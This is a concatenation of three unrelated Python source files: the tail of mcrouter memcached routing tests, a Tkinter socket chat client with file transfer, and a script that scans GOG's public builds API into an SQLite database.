config = './mcrouter/test/test_basic_failover_override.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_failover_override(self):
"""
Tests that the failover overrides work.
"""
mcr = self.get_mcrouter()
# See that failovers are disabled for cluster1
self.mc1.terminate()
self.assertEqual(mcr.set("key1", "value1"), None)
self.assertEqual(mcr.get("key1"), None)
self.assertEqual(mcr.get("key1"), None)
# Check get failover still works
self.assertTrue(self.mc2.set("key2", "value2"))
self.assertEqual(mcr.get("key2"), "value2")
self.assertEqual(mcr.get("key2"), "value2")
class TestBasicFailoverLeastFailures(McrouterTestCase):
"""
The main purpose of this test is to make sure LeastFailures policy
is parsed correctly from json config. We rely on cpp tests to stress
correctness of LeastFailures failover policy.
"""
config = './mcrouter/test/test_basic_failover_least_failures.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
self.mc3 = self.add_server(Memcached())
self.mc4 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_failover_least_failures(self):
mcr = self.get_mcrouter()
self.assertTrue(self.mc4.set("key", "value"))
self.mc1.terminate()
self.mc2.terminate()
self.mc3.terminate()
# Main child #1 fails, as do 2 and 3. No request to 4 since
# max_tries = 3
self.assertEqual(mcr.get("key"), None)
# Now 4 has least errors.
self.assertEqual(mcr.get("key"), "value")
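# Hedged sketch, not the real LeastFailures policy: failover children are
# ordered by their observed error count and only the first max_tries are
# attempted. After the first failed get above, mc1-mc3 each carry one error
# while mc4 carries none, so mc4 is tried first on the next request.
def _least_failures_order_sketch(error_counts, max_tries=3):
    ordered = sorted(error_counts, key=error_counts.get)
    return ordered[:max_tries]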
class TestMcrouterBasicL1L2(McrouterTestCase):
config = './mcrouter/test/test_basic_l1_l2.json'
config_ncache = './mcrouter/test/test_basic_l1_l2_ncache.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.l1 = self.add_server(Memcached())
self.l2 = self.add_server(Memcached())
def get_mcrouter(self, config):
return self.add_mcrouter(config, extra_args=self.extra_args)
def test_l1_l2_get(self):
"""
        Tests that gets using l1/l2 caching and result upgrading are working
"""
mcr = self.get_mcrouter(self.config)
# get a non-existent key
self.assertFalse(mcr.get("key1"))
# set keys in only l1 pool
self.l1.set("key1", "value1")
self.assertEqual(self.l1.get("key1"), "value1")
# perform a get and check the response
        self.assertEqual(mcr.get("key1"), "value1")
# set key only in l2 pool
self.l2.set("key2", "value2")
self.assertEqual(self.l2.get("key2"), "value2")
self.assertEqual(self.l1.get("key2"), None)
# perform a get and check the response
self.assertEqual(mcr.get("key2"), "value2")
        # perform the same get until the value gets upgraded to l1;
        # if the test gets stuck in an infinite loop here, result upgrading is
        # not working
while self.l1.get("key2") != "value2":
self.assertEqual(mcr.get("key2"), "value2")
def test_l1_l2_get_l1_down(self):
"""
        Tests that gets using l1/l2 caching work when l1 is down
"""
mcr = self.get_mcrouter(self.config)
# set key in l1 and l2 pools
self.l1.set("key1", "value1")
self.l2.set("key1", "value1")
self.assertEqual(self.l1.get("key1"), "value1")
self.assertEqual(self.l2.get("key1"), "value1")
# terminate the l1 pool
self.l1.terminate()
# we should still be able to get from l2
self.assertEqual(mcr.get("key1"), "value1")
def test_l1_l2_get_l2_down(self):
"""
        Tests that gets using l1/l2 caching work when l2 is down
"""
mcr = self.get_mcrouter(self.config)
# set key in l1 and l2 pools
self.l1.set("key1", "value1")
self.l2.set("key1", "value1")
self.assertEqual(self.l1.get("key1"), "value1")
self.assertEqual(self.l2.get("key1"), "value1")
# terminate the l2 regional pool
self.l2.terminate()
# we should still be able to get from l1
        self.assertEqual(mcr.get("key1"), "value1")
# terminate l1 pool as well
self.l1.terminate()
# we should get nothing back
self.assertFalse(mcr.get("key1"))
def test_l1_l2_get_ncache(self):
mcr = self.get_mcrouter(self.config_ncache)
# get a non-existent key
self.assertFalse(mcr.get("key1"))
time.sleep(1)
self.assertEqual(self.l1.get("key1"), "ncache")
self.assertTrue(self.l2.set("key1", "value1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
time.sleep(1)
self.assertEqual(mcr.get("key1"), "value1")
self.assertEqual(self.l1.get("key1"), "value1")
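# Hedged sketch, not mcrouter internals: the ncache test above relies on
# negative caching, where an L2 miss plants a short-lived "ncache" sentinel in
# L1 so repeated misses are answered cheaply until the sentinel expires.
# l1 and l2 stand for any cache clients exposing get/set.
def _l1_l2_get_with_ncache_sketch(l1, l2, key, ncache_exptime=1):
    value = l1.get(key)
    if value == "ncache":
        return None                            # miss remembered in L1
    if value is not None:
        return value                           # plain L1 hit
    value = l2.get(key)
    if value is None:
        l1.set(key, "ncache", ncache_exptime)  # remember the miss briefly
        return None
    l1.set(key, value)                         # upgrade the L2 hit into L1
    return value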
class TestMcrouterBasicL1L2SizeSplit(McrouterTestCase):
config = './mcrouter/test/test_basic_l1_l2_sizesplit.json'
config_bothset = './mcrouter/test/test_basic_l1_l2_sizesplit_bothset.json'
extra_args = []
MC_MSG_FLAG_SIZE_SPLIT = 0x20
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.l1 = self.add_server(Memcached())
self.l2 = self.add_server(Memcached())
def get_mcrouter(self, config):
return self.add_mcrouter(config, extra_args=self.extra_args)
def test_l1_l2_sizesplit_get(self):
"""
Basic functionality tests. Sets go to the right place, gets route properly
"""
mcr = self.get_mcrouter(self.config)
# get a non-existent key
self.assertFalse(mcr.get("key1"))
# set small key
mcr.set("key1", "value1")
# small key should be normal value in L1
self.assertEqual(self.l1.get("key1"), "value1")
# small key shouldn't be in L2
self.assertFalse(self.l2.get("key1"))
# perform a get and check the response
self.assertEqual(mcr.get("key1"), "value1")
# key should end up split
value2 = "foo" * 200
mcr.set("key2", value2)
# response should be zero bytes and have the flag
l1res = self.l1.get("key2", return_all_info=True)
self.assertEqual(l1res["value"], "")
self.assertTrue(l1res["flags"] & self.MC_MSG_FLAG_SIZE_SPLIT)
self.assertNotEqual(self.l1.get("key2"), "value1")
# full value on L2
self.assertEqual(self.l2.get("key2"), value2)
# get should run the internal redirect, give us L2 value
self.assertEqual(mcr.get("key2"), value2)
self.assertNotEqual(mcr.get("key2"), "")
def test_l1_l2_sizesplit_bothget(self):
"""
        Basic functionality. Allow full sets to both pools.
"""
mcr = self.get_mcrouter(self.config_bothset)
self.assertFalse(mcr.get("key1"))
# small key should only exist in L1
mcr.set("key1", "value1")
# small key should be normal value in L1
self.assertEqual(self.l1.get("key1"), "value1")
# small key shouldn't be in L2
        self.assertFalse(self.l2.get("key1"))
# perform a get and check the response
self.assertEqual(mcr.get("key1"), "value1")
# key should end up split. end up in both pools.
value2 = "foo" * 200
mcr.set("key2", value2)
# The write to L2 is async and we're checking it right away.
time.sleep(1)
self.assertEqual(self.l1.get("key2"), value2)
self.assertEqual(self.l2.get("key2"), value2)
self.assertEqual(mcr.get("key2"), value2)
def test_l1_l2_get_l2_down(self):
"""
If L2 is down, do we get expected errors.
"""
mcr = self.get_mcrouter(self.config)
value = "foob" * 200
mcr.set("key", value)
self.l2.terminate()
self.assertEqual(self.l1.get("key"), "")
self.assertFalse(mcr.get("key"))
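# Hedged sketch, not mcrouter's size-split route: values above a threshold are
# stored in L1 as an empty sentinel carrying MC_MSG_FLAG_SIZE_SPLIT while the
# full value goes to L2; a get that sees the flag follows the redirect to L2.
# The threshold and the l1/l2 clients here are hypothetical stand-ins.
def _size_split_set_sketch(l1, l2, key, value, threshold=500, flag=0x20):
    if len(value) < threshold:
        l1.set(key, value)                 # small values live in L1 only
    else:
        l1.set(key, "", flags=flag)        # zero-byte marker with the flag
        l2.set(key, value)                 # full value lives in L2
def _size_split_get_sketch(l1, l2, key, flag=0x20):
    res = l1.get(key, return_all_info=True)
    if res is None:
        return None
    if res["flags"] & flag:
        return l2.get(key)                 # follow the internal redirect to L2
    return res["value"]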
class TestMcrouterPortOverride(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_portoverride.json'
def test_portoverride(self):
mc = self.add_server(Memcached())
self.port_map = {}
extra_args = ['--config-params', 'PORT:{}'.format(mc.getport())]
mcr = self.add_mcrouter(self.config, extra_args=extra_args)
self.assertTrue(mcr.set('key', 'value'))
self.assertEqual(mcr.get('key'), 'value')
|
myclient.py
|
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
from tkinter import filedialog, Tk
import os
import time
def recv_file():
print("file request from ")
fname = client_socket.recv(BUFSIZ).decode("utf8")
print ("recieving file " + fname )
fsize = client_socket.recv(BUFSIZ)
fsize = int(fsize)
data_len = 0
print("fsize: {}".format(fsize))
local_file = "../received_files/" + fname
with open(local_file, 'wb') as f:
print ('opened file')
while data_len<fsize:
data = client_socket.recv(BUFSIZ)
if not data:
break
data_len += len(data)
f.write(data)
print("Done writing file at client")
return fname, fsize
def private_recv_file(pclient_socket):
print("file request from ")
fname = pclient_socket.recv(BUFSIZ).decode("utf8")
print ("recieving file " + fname )
fsize = pclient_socket.recv(BUFSIZ)
fsize = int(fsize)
data_len = 0
print("fsize: {}".format(fsize))
local_file = "../received_files/" + fname
with open(local_file, 'wb') as f:
print ('opened file')
while data_len<fsize:
data = pclient_socket.recv(BUFSIZ)
if not data:
break
data_len += len(data)
f.write(data)
print("Done writing file at client")
return fname, fsize
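# Hedged helper sketch (not wired into the handlers above): both receive loops
# read from the socket until the announced byte count has arrived. The same
# idea as a reusable function, assuming the sender really stops after fsize
# bytes, as the senders in this script do.
def recv_exact(sock, fsize, bufsiz=1024):
    chunks = []
    received = 0
    while received < fsize:
        data = sock.recv(min(bufsiz, fsize - received))
        if not data:
            break
        chunks.append(data)
        received += len(data)
    return b"".join(chunks)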
def send_file():
fpath = filedialog.askopenfilename(initialdir = "/",title = "Select file")
fname = fpath.split('/')[-1]
fsize = os.path.getsize(fpath)
client_socket.send(bytes('{file}', "utf8"))
time.sleep(0.5)
client_socket.send(bytes(fname, "utf8"))
time.sleep(0.5)
client_socket.send(bytes(str(fsize), "utf8"))
time.sleep(0.5)
with open(fpath, 'rb') as f:
while True:
data = f.read(BUFSIZ)
if not data:
break
client_socket.sendall(data)
print("File sent to server")
time.sleep(0.5)
def private_send_file(pclient_socket):
fpath = filedialog.askopenfilename(initialdir = "/",title = "Select file")
fname = fpath.split('/')[-1]
fsize = os.path.getsize(fpath)
pclient_socket.send(bytes('{file}', "utf8"))
time.sleep(0.5)
pclient_socket.send(bytes(fname, "utf8"))
time.sleep(0.5)
pclient_socket.send(bytes(str(fsize), "utf8"))
time.sleep(0.5)
with open(fpath, 'rb') as f:
while True:
data = f.read(BUFSIZ)
if not data:
break
pclient_socket.sendall(data)
print("File sent to server")
time.sleep(0.5)
def private_receive(pmsg_list, pclient_socket):
"""Handles receiving of messages."""
# pmsg_list = ptop.messages_frame.msg_list
while True:
try:
msg = pclient_socket.recv(BUFSIZ)
if msg == bytes("{file}", "utf8"):
pmsg_list.insert(tkinter.END, "Receiving File")
fname, fsize = private_recv_file(pclient_socket)
pmsg_list.insert(tkinter.END, "File Recieved")
elif msg == bytes("{quit}", "utf8"):
break
else:
msg = msg.decode('utf8')
pmsg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def receive():
"""Handles receiving of messages."""
buttons_frame = tkinter.Frame(top)
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
# print(msg)
if msg == '{quit}':
break
elif '{prequest}' in msg[0:12]:
name = msg[11:]
handle_connection_request(name)
elif '{name}' in msg[0:6]:
print(msg)
uname.insert(tkinter.END, msg[7:])
elif '{namelist}' in msg[0:12]:
nlist = msg.split('_')[1]
name_list = nlist.split(',')[1:]
print(name_list)
buttons_frame.destroy()
buttons_frame = tkinter.Frame(top)
for name in name_list:
private_button = tkinter.Button(buttons_frame, text=name, command=lambda user=name: create_private(user))
private_button.pack(side=tkinter.LEFT)
buttons_frame.pack(side=tkinter.LEFT)
else:
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def private_send(client_socket_no, pmy_msg, pmsg_list, event=None): # event is passed by binders.
"""Handles sending of messages."""
print("socket")
print(client_socket_no)
print(pmy_msg)
print(pmsg_list)
msg = pmy_msg.get()
    pmy_msg.delete(0, tkinter.END) # Clears input field.
print("message sent is: " + msg)
try:
client_socket_no.send(bytes(msg, "utf8"))
except BrokenPipeError:
error_msg = "Unable to send"
pmsg_list.insert(tkinter.END, error_msg)
if msg == "{quit}":
client_socket_no.close()
top.quit()
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
print("socket")
print(client_socket)
msg = my_msg.get()
my_msg.set("") # Clears input field.
try:
client_socket.send(bytes(msg, "utf8"))
except BrokenPipeError:
error_msg = "Unable to send"
msg_list.insert(tkinter.END, error_msg)
if msg == "{quit}":
client_socket.close()
top.quit()
def create_private(name):
print("create_private")
print(name)
new_name = uname.get('1.0', tkinter.END) + '_' + name
new_name = new_name.replace('\n', '')
print(new_name)
Thread(target=private_client, args=(new_name,)).start()
def private_client(name):
pclient_socket = socket(AF_INET, SOCK_STREAM)
pclient_socket.connect(ADDR)
pclient_socket.send(bytes(name, "utf8"))
ptop = tkinter.Tk()
ptop.title("Private Chat - " + uname.get('1.0', tkinter.END))
messages_frame = tkinter.Frame(ptop)
my_msg = tkinter.StringVar() # For the messages to be sent.
# my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
print(my_msg)
entry_field = tkinter.Entry(ptop, textvariable=my_msg)
entry_field.bind("<Return>", lambda event, temp = pclient_socket: private_send(temp, entry_field, msg_list))
entry_field.pack()
send_button = tkinter.Button(ptop, text="Send", command=lambda: private_send(pclient_socket, entry_field, msg_list))
send_button.pack()
send_file_button = tkinter.Button(ptop, text="Send File", command= lambda: private_send_file(pclient_socket))
send_file_button.pack()
receive_thread = Thread(target=private_receive, args=(msg_list, pclient_socket,))
receive_thread.start()
ptop.mainloop() # Starts GUI execution.
def handle_connection_request(name):
new_name = uname.get('1.0', tkinter.END) + '_' + name + '_'
new_name = new_name.replace('\n', '')
Thread(target=private_client, args=(new_name,)).start()
# def on_closing(event=None):
# """This function is to be called when the window is closed."""
# my_msg.set("{quit}")
# try:
# send()
# except BrokenPipeError:
# print("BrokenPipeError")
# top.quit()
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 35000
else:
PORT = int(PORT)
if not HOST:
HOST = '127.0.0.1'
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
top = tkinter.Tk()
top.title("Group Chat")
uname = tkinter.Text(top)
# uname.pack()
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
# my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
send_file_button = tkinter.Button(top, text="Send File", command=send_file)
send_file_button.pack()
# top.protocol("WM_DELETE_WINDOW", on_closing)
# #----Now comes the sockets part----
# HOST = input('Enter host: ')
# PORT = input('Enter port: ')
# if not PORT:
# PORT = 33000
# else:
# PORT = int(PORT)
# BUFSIZ = 1024
# ADDR = (HOST, PORT)
# client_socket = socket(AF_INET, SOCK_STREAM)
# client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
top.mainloop() # Starts GUI execution.
|
gog_builds_scan.py
|
#!/usr/bin/env python3
'''
@author: Winter Snowfall
@version: 3.00
@date: 20/04/2022
Warning: Built for use with python 3.6+
'''
import json
import threading
import sqlite3
import signal
import requests
import logging
import argparse
import difflib
import re
import os
from sys import argv
from shutil import copy2
from configparser import ConfigParser
from datetime import datetime
from time import sleep
from queue import Queue
from collections import OrderedDict
from logging.handlers import RotatingFileHandler
#uncomment for debugging purposes only
#import traceback
##global parameters init
configParser = ConfigParser()
db_lock = threading.Lock()
config_lock = threading.Lock()
terminate_signal = False
##conf file block
conf_file_full_path = os.path.join('..', 'conf', 'gog_builds_scan.conf')
##logging configuration block
log_file_full_path = os.path.join('..', 'logs', 'gog_builds_scan.log')
logger_file_handler = RotatingFileHandler(log_file_full_path, maxBytes=8388608, backupCount=1, encoding='utf-8')
logger_format = '%(asctime)s %(levelname)s >>> %(message)s'
logger_file_handler.setFormatter(logging.Formatter(logger_format))
#logging level for other modules
logging.basicConfig(format=logger_format, level=logging.ERROR) #DEBUG, INFO, WARNING, ERROR, CRITICAL
logger = logging.getLogger(__name__)
#logging level for current logger
logger.setLevel(logging.INFO) #DEBUG, INFO, WARNING, ERROR, CRITICAL
logger.addHandler(logger_file_handler)
##db configuration block
db_file_full_path = os.path.join('..', 'output_db', 'gog_gles.db')
##CONSTANTS
INSERT_BUILD_QUERY = 'INSERT INTO gog_builds VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)'
UPDATE_BUILD_QUERY = ('UPDATE gog_builds SET gb_int_updated = ?, '
'gb_int_json_payload = ?, '
'gb_int_json_diff = ?, '
'gb_total_count = ?, '
'gb_count = ?, '
'gb_main_version_names = ?, '
'gb_branch_version_names = ?, '
'gb_has_private_branches = ? WHERE gb_int_id = ? AND gb_int_os = ?')
INSERT_INSTALLERS_DELTA_QUERY = 'INSERT INTO gog_installers_delta VALUES (?,?,?,?,?,?,?,?,?)'
OPTIMIZE_QUERY = 'PRAGMA optimize'
#static regex pattern for removing GOG version strings from builds/installers
GOG_VERSION_REMOVAL_REGEX = re.compile('GOG[0-9]{0,5}')
#value separator for multi-valued fields
MVF_VALUE_SEPARATOR = '; '
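#hedged illustration, not called anywhere in this script: quick sanity check of
#the two constants above - the regex strips trailing GOG<number> build markers
#and the separator joins multi-valued fields before they are stored
def _constants_demo():
    assert GOG_VERSION_REMOVAL_REGEX.sub('', '1.05GOG3') == '1.05'
    assert MVF_VALUE_SEPARATOR.join(('1.0 ||| beta', '1.1')) == '1.0 ||| beta; 1.1'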
def sigterm_handler(signum, frame):
logger.info('Stopping scan due to SIGTERM...')
raise SystemExit(0)
def terminate_script():
logger.critical('Forcefully stopping script!')
#flush buffers
os.sync()
#forcefully terminate script process
os.kill(os.getpid(), signal.SIGKILL)
def gog_builds_query(product_id, os, scan_mode, session, db_connection):
builds_url = f'https://content-system.gog.com/products/{product_id}/os/{os}/builds?generation=2'
try:
response = session.get(builds_url, timeout=HTTP_TIMEOUT)
logger.debug(f'BQ >>> HTTP response code: {response.status_code}.')
if response.status_code == 200:
try:
json_parsed = json.loads(response.text, object_pairs_hook=OrderedDict)
total_count = json_parsed['total_count']
logger.debug(f'BQ >>> Total count: {total_count}.')
except:
logger.warning(f'BQ >>> Unable to retrieve total_count for {product_id}, {os}.')
raise Exception()
if total_count > 0:
logger.debug(f'BQ >>> Found builds for id {product_id}, {os}...')
db_cursor = db_connection.execute('SELECT COUNT(*) FROM gog_builds WHERE gb_int_id = ? AND gb_int_os = ?', (product_id, os))
entry_count = db_cursor.fetchone()[0]
#no need to do any processing if an entry is found in 'full', 'products' or 'manual' scan modes,
#since that entry will be skipped anyway
if not (entry_count == 1 and (scan_mode == 'full' or scan_mode == 'products' or scan_mode == 'manual')):
json_formatted = json.dumps(json_parsed, sort_keys=True, indent=4, separators=(',', ': '), ensure_ascii=False)
count = json_parsed['count']
#main and branch version names splitting and annotation logic
if len(json_parsed['items']) != 0:
main_item_list = []
branch_item_list = []
for item in json_parsed['items']:
if item['version_name'] != '':
current_branch = item['branch']
current_version_name = item['version_name']
#there are no blank string branches as of now, only null ones
if current_branch is not None:
branch_item_list.append(f'{current_version_name} ||| {current_branch}')
else:
main_item_list.append(current_version_name)
main_version_names = MVF_VALUE_SEPARATOR.join(main_item_list)
branch_version_names = MVF_VALUE_SEPARATOR.join(branch_item_list)
#older entries may contain only a single un-named version
if main_version_names == '': main_version_names = None
if branch_version_names == '': branch_version_names = None
else:
main_version_names = None
branch_version_names = None
has_private_branches = json_parsed['has_private_branches']
db_cursor.execute('SELECT gp_title FROM gog_products WHERE gp_id = ?', (product_id, ))
result = db_cursor.fetchone()
#entries with just hidden builds will not link to any gog_product entry
product_name = result[0] if result is not None else None
if entry_count == 0:
#gb_int_nr, gb_int_added, gb_int_updated, gb_int_json_payload,
#gb_int_json_diff, gb_id, gb_product_title, gb_os,
#gb_total_count, gb_count, gb_main_version_names,
#gb_branch_version_names, gb_has_private_branches
with db_lock:
db_cursor.execute(INSERT_BUILD_QUERY, (None, datetime.now(), None, json_formatted,
None, product_id, product_name, os,
total_count, count, main_version_names,
branch_version_names, has_private_branches))
db_connection.commit()
logger.info(f'BQ +++ Added a new DB entry for {product_id}: {product_name}, {os}.')
elif entry_count == 1:
#do not update existing entries in a full, products or manual scan, since update/delta scans will take care of that
if scan_mode == 'full' or scan_mode == 'products' or scan_mode == 'manual':
logger.info(f'BQ >>> Found an existing db entry with id {product_id}, {os}. Skipping.')
else:
db_cursor.execute('SELECT gb_int_json_payload, gb_int_title FROM gog_builds '
'WHERE gb_int_id = ? AND gb_int_os = ?', (product_id, os))
existing_json_formatted, existing_product_name = db_cursor.fetchone()
if product_name is not None and existing_product_name != product_name:
logger.info(f'BQ >>> Found a valid (or new) product name: {product_name}. Updating...')
with db_lock:
db_cursor.execute('UPDATE gog_builds SET gb_int_title = ? WHERE gb_int_id = ? AND gb_int_os = ?',
(product_name, product_id, os))
db_connection.commit()
logger.info(f'BQ ~~~ Successfully updated product name for DB entry with id {product_id}, {os}.')
if existing_json_formatted != json_formatted:
logger.debug(f'BQ >>> Existing entry for {product_id}, {os} is outdated. Updating...')
#calculate the diff between the new json and the previous one
#(applying the diff on the new json will revert to the previous version)
diff_formatted = ''.join([line for line in difflib.unified_diff(json_formatted.splitlines(1),
existing_json_formatted.splitlines(1), n=0)])
#gb_int_latest_update, gb_int_json_payload, gb_int_previous_json_diff,
#gb_total_count, gb_count, gb_main_version_names, gb_branch_version_names,
#gb_has_private_branches, gb_id (WHERE clause), gb_os (WHERE clause)
with db_lock:
db_cursor.execute(UPDATE_BUILD_QUERY, (datetime.now(), json_formatted, diff_formatted,
total_count, count, main_version_names, branch_version_names,
has_private_branches, product_id, os))
db_connection.commit()
logger.info(f'BQ ~~~ Updated the DB entry for {product_id}: {product_name}, {os}.')
else:
logger.warning(f'BQ >>> HTTP error code {response.status_code} received for {product_id}, {os}.')
raise Exception()
return True
#sometimes the HTTPS connection encounters SSL errors
except requests.exceptions.SSLError:
logger.warning(f'BQ >>> Connection SSL error encountered for {product_id}, {os}.')
return False
#sometimes the HTTPS connection gets rejected/terminated
except requests.exceptions.ConnectionError:
logger.warning(f'BQ >>> Connection error encountered for {product_id}, {os}.')
return False
except:
logger.debug(f'BQ >>> Builds query has failed for {product_id}, {os}.')
#uncomment for debugging purposes only
#logger.error(traceback.format_exc())
return False
def worker_thread(thread_number, scan_mode):
global terminate_signal
threadConfigParser = ConfigParser()
with requests.Session() as threadSession:
with sqlite3.connect(db_file_full_path) as thread_db_connection:
while not terminate_signal:
product_id, os = queue.get()
retry_counter = 0
retries_complete = False
while not retries_complete and not terminate_signal:
if retry_counter > 0:
logger.debug(f'T#{thread_number} >>> Retry count: {retry_counter}.')
                        #main iteration incremental sleep
sleep((retry_counter ** RETRY_AMPLIFICATION_FACTOR) * RETRY_SLEEP_INTERVAL)
retries_complete = gog_builds_query(product_id, os, scan_mode, threadSession, thread_db_connection)
if retries_complete:
if retry_counter > 0:
                            logger.info(f'T#{thread_number} >>> Successfully retried for {product_id}, {os}.')
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'T#{thread_number} >>> Request most likely blocked/invalidated by GOG. Terminating process.')
terminate_signal = True
#forcefully terminate script
terminate_script()
#only do product_id processing on 'windows' build scans
if not terminate_signal and os == 'windows' and product_id % ID_SAVE_INTERVAL == 0:
with config_lock:
threadConfigParser.read(conf_file_full_path)
threadConfigParser['FULL_SCAN']['start_id'] = str(product_id)
with open(conf_file_full_path, 'w') as file:
threadConfigParser.write(file)
logger.info(f'T#{thread_number} >>> Processed up to id: {product_id}...')
queue.task_done()
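#hedged illustration, not called by the script: the incremental sleep used in
#the retry loops grows as (retry_counter ** RETRY_AMPLIFICATION_FACTOR) *
#RETRY_SLEEP_INTERVAL; the defaults below assume a factor of 2 and a 5 second
#interval (the real values come from the conf file)
def _retry_backoff_demo(retry_count=4, amplification_factor=2, sleep_interval=5):
    #e.g. the defaults yield [5, 20, 45, 80] seconds for retries 1 through 4
    return [(retry ** amplification_factor) * sleep_interval
            for retry in range(1, retry_count + 1)]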
##main thread start
logger.info('*** Running BUILDS scan script ***')
parser = argparse.ArgumentParser(description=('GOG builds scan (part of gog_gles) - a script to call publicly available GOG APIs '
'in order to retrieve builds information and updates.'))
group = parser.add_mutually_exclusive_group()
group.add_argument('-u', '--update', help='Perform an update builds scan', action='store_true')
group.add_argument('-f', '--full', help='Perform a full builds scan', action='store_true')
group.add_argument('-p', '--products', help='Perform a products-based builds scan', action='store_true')
group.add_argument('-m', '--manual', help='Perform a manual builds scan', action='store_true')
group.add_argument('-d', '--delta', help='Produce a list of ids whose latest builds are exclusive to Galaxy', action='store_true')
args = parser.parse_args()
try:
#reading from config file
configParser.read(conf_file_full_path)
general_section = configParser['GENERAL']
#parsing generic parameters
conf_backup = general_section.get('conf_backup')
db_backup = general_section.get('db_backup')
scan_mode = general_section.get('scan_mode')
#parsing constants
HTTP_TIMEOUT = general_section.getint('http_timeout')
RETRY_COUNT = general_section.getint('retry_count')
RETRY_SLEEP_INTERVAL = general_section.getint('retry_sleep_interval')
RETRY_AMPLIFICATION_FACTOR = general_section.getint('retry_amplification_factor')
except:
logger.critical('Could not parse configuration file. Please make sure the appropriate structure is in place!')
raise SystemExit(1)
#detect any parameter overrides and set the scan_mode accordingly
if len(argv) > 1:
logger.info('Command-line parameter mode override detected.')
if args.update:
scan_mode = 'update'
elif args.full:
scan_mode = 'full'
elif args.products:
scan_mode = 'products'
elif args.manual:
scan_mode = 'manual'
elif args.delta:
scan_mode = 'delta'
#boolean 'true' or scan_mode specific activation
if conf_backup == 'true' or conf_backup == scan_mode:
if os.path.exists(conf_file_full_path):
#create a backup of the existing conf file - mostly for debugging/recovery
copy2(conf_file_full_path, conf_file_full_path + '.bak')
logger.info('Successfully created conf file backup.')
else:
        logger.critical('Could not find the specified conf file!')
raise SystemExit(2)
#boolean 'true' or scan_mode specific activation
if db_backup == 'true' or db_backup == scan_mode:
if os.path.exists(db_file_full_path):
#create a backup of the existing db - mostly for debugging/recovery
copy2(db_file_full_path, db_file_full_path + '.bak')
logger.info('Successfully created DB backup.')
else:
#subprocess.run(['python', 'gog_create_db.py'])
        logger.critical('Could not find the specified DB file!')
raise SystemExit(3)
if scan_mode == 'full':
logger.info('--- Running in FULL scan mode ---')
#catch SIGTERM and exit gracefully
signal.signal(signal.SIGTERM, sigterm_handler)
    #threads sync (on exit) timeout interval (seconds)
THREAD_SYNC_TIMEOUT = 30
full_scan_section = configParser['FULL_SCAN']
ID_SAVE_INTERVAL = full_scan_section.getint('id_save_interval')
#number of active connection threads
CONNECTION_THREADS = full_scan_section.getint('connection_threads')
#stop_id = 2147483647, in order to scan the full range,
#stopping at the upper limit of a 32 bit signed integer type
stop_id = full_scan_section.getint('stop_id')
    #product_id will restart from start_id
product_id = full_scan_section.getint('start_id')
#reduce starting point by a save interval to account for any thread overlap
if product_id > ID_SAVE_INTERVAL: product_id -= ID_SAVE_INTERVAL
logger.info(f'Restarting scan from id: {product_id}.')
queue = Queue(CONNECTION_THREADS * 2)
try:
for thread_no in range(CONNECTION_THREADS):
#apply spacing to single digit thread_no for nicer logging in case of 10+ threads
THREAD_LOGGING_FILLER = '0' if CONNECTION_THREADS > 9 and thread_no < 9 else ''
thread_no_nice = THREAD_LOGGING_FILLER + str(thread_no + 1)
logger.info(f'Starting thread T#{thread_no_nice}...')
#setting daemon threads and a max limit to the thread sync on exit interval will prevent lockups
thread = threading.Thread(target=worker_thread, args=(thread_no_nice, scan_mode), daemon=True)
thread.start()
while not terminate_signal and product_id <= stop_id:
logger.debug(f'Processing the following product_id: {product_id}.')
#will block by default if the queue is full
queue.put((product_id, 'windows'))
#will block by default if the queue is full
queue.put((product_id, 'osx'))
product_id += 1
#simulate a regular keyboard stop when stop_id is reached
if product_id > stop_id:
logger.info(f'Stop id of {stop_id} reached. Halting processing...')
#write the stop_id as the start_id in the config file
configParser.read(conf_file_full_path)
configParser['FULL_SCAN']['start_id'] = str(product_id)
with open(conf_file_full_path, 'w') as file:
configParser.write(file)
raise KeyboardInterrupt
except KeyboardInterrupt:
terminate_signal = True
